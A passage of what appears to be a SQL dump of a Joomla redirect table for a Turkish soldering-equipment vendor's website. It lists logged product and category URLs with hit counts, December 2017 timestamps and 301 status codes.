00:00:00',301),(15624,'http://3s-technologies.com.tr/index.php/en/products/jv131-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-07 11:08:15','0000-00-00 00:00:00',301),(15625,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/dirdesc/results,1-50',NULL,'','',5,0,'2017-12-07 11:09:15','0000-00-00 00:00:00',301),(15626,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/955lc-37-detail',NULL,'','',24,0,'2017-12-07 11:11:33','0000-00-00 00:00:00',301),(15627,'https://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,category_name?language=en-gb',NULL,'','',1,0,'2017-12-07 11:32:06','0000-00-00 00:00:00',301),(15628,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/rh2-20-detail/askquestion?tmpl=component',NULL,'','',28,0,'2017-12-07 11:58:34','0000-00-00 00:00:00',301),(15629,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_name/dirdesc/results,1-10',NULL,'','',10,0,'2017-12-07 12:13:52','0000-00-00 00:00:00',301),(15630,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/by,category_name?language=en-gb',NULL,'','',24,0,'2017-12-07 12:18:09','0000-00-00 00:00:00',301),(15631,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,ordering/results,1-20',NULL,'','',8,0,'2017-12-07 12:41:33','0000-00-00 00:00:00',301),(15632,'http://www.3s-technologies.com.tr/tr/urunler/mx200lp-detail?tmpl=component&print=1',NULL,'','',33,0,'2017-12-07 12:48:45','0000-00-00 00:00:00',301),(15633,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,category_name?language=en-gb',NULL,'','',1,0,'2017-12-07 13:01:51','0000-00-00 00:00:00',301),(15634,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-12-07 13:02:46','0000-00-00 00:00:00',301),(15635,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/mi-300-detail',NULL,'','',45,0,'2017-12-07 13:10:31','0000-00-00 00:00:00',301),(15636,'https://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/ls60v-detail',NULL,'','',1,0,'2017-12-07 13:17:28','0000-00-00 00:00:00',301),(15637,'https://www.3s-technologies.com.tr/en/products/manufacturers/aqueous',NULL,'','',1,0,'2017-12-07 13:25:30','0000-00-00 00:00:00',301),(15638,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,category_name/dirdesc/results,1-5',NULL,'','',3,0,'2017-12-07 13:36:57','0000-00-00 00:00:00',301),(15639,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',13,0,'2017-12-07 13:52:33','0000-00-00 00:00:00',301),(15640,'https://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/ls60v-detail',NULL,'','',1,0,'2017-12-07 13:53:29','0000-00-00 00:00:00',301),(15641,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,category_name/dirdesc/results,1-20',NULL,'','',3,0,'2017-12-07 13:55:24','0000-00-00 00:00:00',301),(15642,'http://3s-technologies.com.tr/index.php/en/products/spr-20-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-07 14:03:53','0000-00-00 00:00:00',301),(15643,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,mf_name/results,1-40',NULL,'','',4,0,'2017-12-07 14:04:40','0000-00-00 00:00:00',301),(15644,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer',NULL,'','',18,0,'2017-12-07 14:32:52','0000-00-00 00:00:00',301),(15645,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-07 14:43:18','0000-00-00 00:00:00',301),(15646,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/by,mf_name/results,1-10',NULL,'','',9,0,'2017-12-07 14:50:47','0000-00-00 00:00:00',301),(15647,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,category_name/dirdesc/results,1-50',NULL,'','',4,0,'2017-12-07 15:00:01','0000-00-00 00:00:00',301),(15648,'http://www.3s-technologies.com.tr/tr/welcome.html',NULL,'','',119,0,'2017-12-07 15:08:49','0000-00-00 00:00:00',301),(15649,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,category_name/dirdesc/results,1-100',NULL,'','',1,0,'2017-12-07 15:09:14','0000-00-00 00:00:00',301),(15650,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,ordering?language=tr-tr',NULL,'','',7,0,'2017-12-07 15:49:52','0000-00-00 00:00:00',301),(15651,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-12-07 15:57:23','0000-00-00 00:00:00',301),(15652,'http://www.3s-technologies.com.tr/tr/ueruenler/lehimleme-malzemeleri/ã§ubuk-lehim',NULL,'','',1,0,'2017-12-07 16:03:58','0000-00-00 00:00:00',301),(15653,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/by,mf_name',NULL,'','',60,0,'2017-12-07 16:08:17','0000-00-00 00:00:00',301),(15654,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer',NULL,'','',29,0,'2017-12-07 16:26:35','0000-00-00 00:00:00',301),(15655,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,category_name/dirdesc/results,1-20',NULL,'','',4,0,'2017-12-07 16:32:20','0000-00-00 00:00:00',301),(15656,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/rh2-detail/askquestion?tmpl=component',NULL,'','',12,0,'2017-12-07 16:39:56','0000-00-00 00:00:00',301),(15657,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_sku/results,1-40',NULL,'','',2,0,'2017-12-07 16:41:32','0000-00-00 00:00:00',301),(15658,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,product_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-12-07 17:17:49','0000-00-00 00:00:00',301),(15659,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail',NULL,'','',54,0,'2017-12-07 17:24:45','0000-00-00 00:00:00',301),(15660,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_sku/results,1-10',NULL,'','',3,0,'2017-12-07 17:36:56','0000-00-00 00:00:00',301),(15661,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_name/results,1-40',NULL,'','',8,0,'2017-12-07 19:17:33','0000-00-00 00:00:00',301),(15662,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,ordering/results,1-50?language=en-gb',NULL,'','',1,0,'2017-12-07 19:26:20','0000-00-00 00:00:00',301),(15663,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,ordering?language=tr-tr',NULL,'','',24,0,'2017-12-07 20:02:14','0000-00-00 00:00:00',301),(15664,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',22,0,'2017-12-07 20:02:29','0000-00-00 00:00:00',301),(15665,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/dirdesc/results,1-50',NULL,'','',8,0,'2017-12-07 20:10:14','0000-00-00 00:00:00',301),(15666,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,product_sku?language=tr-tr',NULL,'','',24,0,'2017-12-07 20:41:13','0000-00-00 00:00:00',301),(15667,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,product_name/dirdesc/results,1-20',NULL,'','',1,0,'2017-12-07 20:54:08','0000-00-00 00:00:00',301),(15668,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/dirdesc?language=tr-tr',NULL,'','',15,0,'2017-12-07 21:03:24','0000-00-00 00:00:00',301),(15669,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,ordering?language=tr-tr',NULL,'','',24,0,'2017-12-07 21:22:15','0000-00-00 00:00:00',301),(15670,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/av132-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-07 21:27:46','0000-00-00 00:00:00',301),(15671,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail',NULL,'','',53,0,'2017-12-07 21:33:28','0000-00-00 00:00:00',301),(15672,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',7,0,'2017-12-07 21:43:57','0000-00-00 00:00:00',301),(15673,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,mf_name?language=tr-tr',NULL,'','',23,0,'2017-12-07 22:13:18','0000-00-00 00:00:00',301),(15674,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,category_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-12-07 22:16:03','0000-00-00 00:00:00',301),(15675,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/955lc-detail',NULL,'','',10,0,'2017-12-07 22:24:18','0000-00-00 00:00:00',301),(15676,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,ordering?language=tr-tr',NULL,'','',7,0,'2017-12-07 22:58:18','0000-00-00 00:00:00',301),(15677,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/templates/beez-2/home-page-beez-2/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',24,0,'2017-12-07 23:04:53','0000-00-00 00:00:00',301),(15678,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=81&itemid=40&lang=en',NULL,'','',3,0,'2017-12-07 23:14:36','0000-00-00 00:00:00',301),(15679,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-07 23:24:20','0000-00-00 00:00:00',301),(15680,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-34-detail',NULL,'','',23,0,'2017-12-07 23:37:50','0000-00-00 00:00:00',301),(15681,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/sp-18p-l-detail',NULL,'','',13,0,'2017-12-08 00:44:38','0000-00-00 00:00:00',301),(15682,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_sku/results,1-20?language=en-gb',NULL,'','',1,0,'2017-12-08 00:51:12','0000-00-00 00:00:00',301),(15683,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/asp-300-detail',NULL,'','',26,0,'2017-12-08 01:08:32','0000-00-00 00:00:00',301),(15684,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/dirdesc/results,1-5',NULL,'','',10,0,'2017-12-08 01:26:20','0000-00-00 00:00:00',301),(15685,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_sku/results,1-50?language=en-gb',NULL,'','',7,0,'2017-12-08 02:10:13','0000-00-00 00:00:00',301),(15686,'https://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-08 02:30:58','0000-00-00 00:00:00',301),(15687,'http://3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,product_name?language=tr-tr',NULL,'','',7,0,'2017-12-08 02:35:18','0000-00-00 00:00:00',301),(15688,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,category_name/results,1-5?language=en-gb',NULL,'','',4,0,'2017-12-08 02:45:20','0000-00-00 00:00:00',301),(15689,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim',NULL,'','',16,0,'2017-12-08 03:02:40','0000-00-00 00:00:00',301),(15690,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name?language=en-gb',NULL,'','',24,0,'2017-12-08 03:18:52','0000-00-00 00:00:00',301),(15691,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,`p`.product_sku?language=tr-tr',NULL,'','',7,0,'2017-12-08 03:53:39','0000-00-00 00:00:00',301),(15692,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/ã§ubuk-lehim/by,product_name',NULL,'','',1,0,'2017-12-08 03:59:02','0000-00-00 00:00:00',301),(15693,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2017-12-08 03:59:27','0000-00-00 00:00:00',301),(15694,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/dirdesc/results,1-5',NULL,'','',8,0,'2017-12-08 04:04:22','0000-00-00 00:00:00',301),(15695,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-08 04:15:47','0000-00-00 00:00:00',301),(15696,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,product_sku?language=tr-tr',NULL,'','',18,0,'2017-12-08 04:41:25','0000-00-00 00:00:00',301),(15697,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/krem-lehim-31-32-33-34-detail',NULL,'','',22,0,'2017-12-08 04:50:21','0000-00-00 00:00:00',301),(15698,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/245-k100-28-29-detail',NULL,'','',32,0,'2017-12-08 04:50:33','0000-00-00 00:00:00',301),(15699,'https://www.3s-technologies.com.tr/en/products/temizleme-makineleri/by,category_name',NULL,'','',1,0,'2017-12-08 04:52:15','0000-00-00 00:00:00',301),(15700,'http://www.3s-technologies.com.tr/index.php/en/products/spr-20-41-detail?tmpl=component&print=1',NULL,'','',23,0,'2017-12-08 04:58:55','0000-00-00 00:00:00',301),(15701,'https://www.3s-technologies.com.tr/en/products/manufacturer/mirae',NULL,'','',1,0,'2017-12-08 05:09:47','0000-00-00 00:00:00',301),(15702,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/le-40v-detail/askquestion?tmpl=component',NULL,'','',211,0,'2017-12-08 05:40:57','0000-00-00 00:00:00',301),(15703,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j2_3/index.php/tr/component/virtuemart/led-paneller/led-panel-sıvaustu?itemid=124',NULL,'','',2,0,'2017-12-08 05:43:29','0000-00-00 00:00:00',301),(15704,'http://3s-technologies.com.tr/index.php/tr/ueruenler/flux/955lc-37-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-08 05:43:55','0000-00-00 00:00:00',301),(15705,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',24,0,'2017-12-08 05:45:08','0000-00-00 00:00:00',301),(15706,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,product_name',NULL,'','',201,0,'2017-12-08 06:40:52','0000-00-00 00:00:00',301),(15707,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,product_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-12-08 06:55:23','0000-00-00 00:00:00',301),(15708,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim',NULL,'','',87,0,'2017-12-08 07:10:47','0000-00-00 00:00:00',301),(15709,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-12-08 07:33:13','0000-00-00 00:00:00',301),(15710,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-12-08 07:49:29','0000-00-00 00:00:00',301),(15711,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-12-08 08:17:22','0000-00-00 00:00:00',301),(15712,'http://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/rl132-detail/askquestion?tmpl=component',NULL,'','',13,0,'2017-12-08 08:31:18','0000-00-00 00:00:00',301),(15713,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,product_sku?language=tr-tr',NULL,'','',1,0,'2017-12-08 08:42:31','0000-00-00 00:00:00',301),(15714,'https://www.3s-technologies.com.tr/index.php/en/products/av132-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-08 08:45:51','0000-00-00 00:00:00',301),(15715,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,`p`.product_sku?language=tr-tr',NULL,'','',7,0,'2017-12-08 08:51:06','0000-00-00 00:00:00',301),(15716,'https://www.3s-technologies.com.tr/tr/urunler/manufacturers/ddm-novastar',NULL,'','',1,0,'2017-12-08 09:17:19','0000-00-00 00:00:00',301),(15717,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_sku',NULL,'','',411,0,'2017-12-08 09:49:14','0000-00-00 00:00:00',301),(15718,'http://www.3s-technologies.com.tr/index.php/en/products/av132-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-08 10:14:33','0000-00-00 00:00:00',301),(15719,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,category_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-12-08 10:17:44','0000-00-00 00:00:00',301),(15720,'http://3s-technologies.com.tr/index.php/en/using-joomla/extensions/templates/atomic/home-page-atomic/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',7,0,'2017-12-08 10:23:43','0000-00-00 00:00:00',301),(15721,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',49,0,'2017-12-08 10:45:13','0000-00-00 00:00:00',301),(15722,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by?`p`.product_sku/dirdesc&error=404&language=en-gb',NULL,'','',1,0,'2017-12-08 10:49:30','0000-00-00 00:00:00',301),(15723,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/275-k100-1.2mm-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-08 10:50:34','0000-00-00 00:00:00',301),(15724,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j2_3/index.php/en/component/virtuemart/led-paneller/led-panel-sıvaustu/dirdesc?itemid=125',NULL,'','',3,0,'2017-12-08 10:53:22','0000-00-00 00:00:00',301),(15725,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',43,0,'2017-12-08 10:59:50','0000-00-00 00:00:00',301),(15726,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-08 11:07:35','0000-00-00 00:00:00',301),(15727,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/am100-detail/askquestion?tmpl=component',NULL,'','',55,0,'2017-12-08 11:19:05','0000-00-00 00:00:00',301),(15728,'https://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri',NULL,'','',1,0,'2017-12-08 11:52:05','0000-00-00 00:00:00',301),(15729,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/joomla/index.php/fr/iletisim-2?format=feed&type=rss',NULL,'','',1,0,'2017-12-08 11:56:12','0000-00-00 00:00:00',301),(15730,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/dirdesc?language=tr-tr',NULL,'','',13,0,'2017-12-08 12:04:45','0000-00-00 00:00:00',301),(15731,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name?language=en-gb',NULL,'','',1,0,'2017-12-08 12:07:29','0000-00-00 00:00:00',301),(15732,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,category_name?language=en-gb',NULL,'','',2,0,'2017-12-08 12:24:56','0000-00-00 00:00:00',301),(15733,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,product_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-12-08 12:43:17','0000-00-00 00:00:00',301),(15734,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-k100-28-29-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-08 12:43:25','0000-00-00 00:00:00',301),(15735,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,pc.ordering,product_name/results,1-5',NULL,'','',4,0,'2017-12-08 12:51:10','0000-00-00 00:00:00',301),(15736,'http://www.3s-technologies.com.tr/index.php/en/products/spartan-8s-8d-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-08 12:52:07','0000-00-00 00:00:00',301),(15737,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler',NULL,'','',7,0,'2017-12-08 13:23:36','0000-00-00 00:00:00',301),(15738,'http://3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,category_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-12-08 13:43:25','0000-00-00 00:00:00',301),(15739,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_sku',NULL,'','',4,0,'2017-12-08 13:43:51','0000-00-00 00:00:00',301),(15740,'http://www.3s-technologies.com.tr/tr/joomla/images/pdf/finalk100ldbrochure4.pdf',NULL,'','',13,0,'2017-12-08 13:55:10','0000-00-00 00:00:00',301),(15741,'https://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/rh6-detail',NULL,'','',1,0,'2017-12-08 14:28:57','0000-00-00 00:00:00',301),(15742,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,product_sku?language=tr-tr',NULL,'','',30,0,'2017-12-08 14:33:59','0000-00-00 00:00:00',301),(15743,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim',NULL,'','',7,0,'2017-12-08 14:38:04','0000-00-00 00:00:00',301),(15744,'https://www.3s-technologies.com.tr/index.php/en/products/avb-detail?tmpl=component&print=1',NULL,'','',2,0,'2017-12-08 14:44:08','0000-00-00 00:00:00',301),(15745,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,product_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-12-08 14:55:34','0000-00-00 00:00:00',301),(15746,'http://3s-technologies.com.tr/en/products/2.-el-makineler/rh2-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-08 14:59:57','0000-00-00 00:00:00',301),(15747,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,category_name?language=tr-tr',NULL,'','',9,0,'2017-12-08 15:20:41','0000-00-00 00:00:00',301),(15748,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/mx200lp-3-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-12-08 15:25:27','0000-00-00 00:00:00',301),(15749,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole',NULL,'','',14,0,'2017-12-08 15:28:38','0000-00-00 00:00:00',301),(15750,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,category_name/dirdesc/results,1-5',NULL,'','',1,0,'2017-12-08 15:51:54','0000-00-00 00:00:00',301),(15751,'http://www.3s-technologies.com.tr/en/products/manufacturer/dalga-lehim',NULL,'','',42,0,'2017-12-08 16:02:11','0000-00-00 00:00:00',301),(15752,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/rh6-detail',NULL,'','',16,0,'2017-12-08 16:11:18','0000-00-00 00:00:00',301),(15753,'http://3s-technologies.com.tr/tr/urunler/thru-hole/rl132-detail/askquestion?tmpl=component',NULL,'','',18,0,'2017-12-08 16:32:39','0000-00-00 00:00:00',301),(15754,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız',NULL,'','',172,0,'2017-12-08 16:42:32','0000-00-00 00:00:00',301),(15755,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,category_name/dirdesc/results,1-5',NULL,'','',4,0,'2017-12-08 17:13:09','0000-00-00 00:00:00',301),(15756,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',54,0,'2017-12-08 17:37:42','0000-00-00 00:00:00',301),(15757,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-08 18:11:13','0000-00-00 00:00:00',301),(15758,'http://3s-technologies.com.tr/index.php/tr/ueruenler/spr-20-41-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-12-08 18:18:44','0000-00-00 00:00:00',301),(15759,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-12-08 18:24:38','0000-00-00 00:00:00',301),(15760,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,product_name/dirdesc/results,1-50',NULL,'','',1,0,'2017-12-08 18:57:40','0000-00-00 00:00:00',301),(15761,'http://www.3s-technologies.com.tr/joomla/index.php?format=feed&type=rss&lang=en',NULL,'','',101,0,'2017-12-08 19:02:37','0000-00-00 00:00:00',301),(15762,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,product_name?language=en-gb',NULL,'','',23,0,'2017-12-08 19:09:12','0000-00-00 00:00:00',301),(15763,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/dirdesc?language=en-gb',NULL,'','',25,0,'2017-12-08 19:09:17','0000-00-00 00:00:00',301),(15764,'http://3s-technologies.com.tr/en/?option=com_content&view=article&id=125&itemid=131',NULL,'','',15,0,'2017-12-08 19:53:21','0000-00-00 00:00:00',301),(15765,'http://3s-technologies.com.tr/en/?option=com_content&view=article&id=137&itemid=139',NULL,'','',15,0,'2017-12-08 19:53:25','0000-00-00 00:00:00',301),(15766,'http://3s-technologies.com.tr/en/?option=com_content&view=article&id=137&itemid=139&lang=t',NULL,'','',13,0,'2017-12-08 19:53:41','0000-00-00 00:00:00',301),(15767,'http://3s-technologies.com.tr/en/?option=com_content&view=article&id=138&itemid=140',NULL,'','',15,0,'2017-12-08 19:53:47','0000-00-00 00:00:00',301),(15768,'http://3s-technologies.com.tr/en/?option=com_content&view=article&id=139&itemid=141',NULL,'','',15,0,'2017-12-08 19:53:59','0000-00-00 00:00:00',301),(15769,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,category_name/dirdesc/results,1-10',NULL,'','',4,0,'2017-12-08 19:54:12','0000-00-00 00:00:00',301),(15770,'http://3s-technologies.com.tr/en/?option=com_content&view=article&id=140&itemid=142',NULL,'','',4,0,'2017-12-08 19:54:21','0000-00-00 00:00:00',301),(15771,'http://3s-technologies.com.tr/en/?option=com_content&view=article&id=141&itemid=143',NULL,'','',15,0,'2017-12-08 19:54:30','0000-00-00 00:00:00',301),(15772,'http://3s-technologies.com.tr/en/?option=com_content&view=article&id=168&itemid=58',NULL,'','',15,0,'2017-12-08 19:54:36','0000-00-00 00:00:00',301),(15773,'http://3s-technologies.com.tr/en/?option=com_content&view=article&id=81&itemid=40',NULL,'','',14,0,'2017-12-08 19:55:18','0000-00-00 00:00:00',301),(15774,'http://3s-technologies.com.tr/en/?option=com_content&view=article&id=82&itemid=38',NULL,'','',14,0,'2017-12-08 19:55:29','0000-00-00 00:00:00',301),(15775,'http://3s-technologies.com.tr/en/?option=com_content&view=article&id=88&itemid=100',NULL,'','',9,0,'2017-12-08 19:55:52','0000-00-00 00:00:00',301),(15776,'http://3s-technologies.com.tr/en/?option=com_content&view=article&id=90&itemid=102',NULL,'','',9,0,'2017-12-08 19:55:59','0000-00-00 00:00:00',301),(15777,'http://3s-technologies.com.tr/en/?option=com_content&view=article&id=93&itemid=104',NULL,'','',9,0,'2017-12-08 19:56:04','0000-00-00 00:00:00',301),(15778,'http://3s-technologies.com.tr/en/?option=com_content&view=article&id=99&itemid=43',NULL,'','',10,0,'2017-12-08 19:56:12','0000-00-00 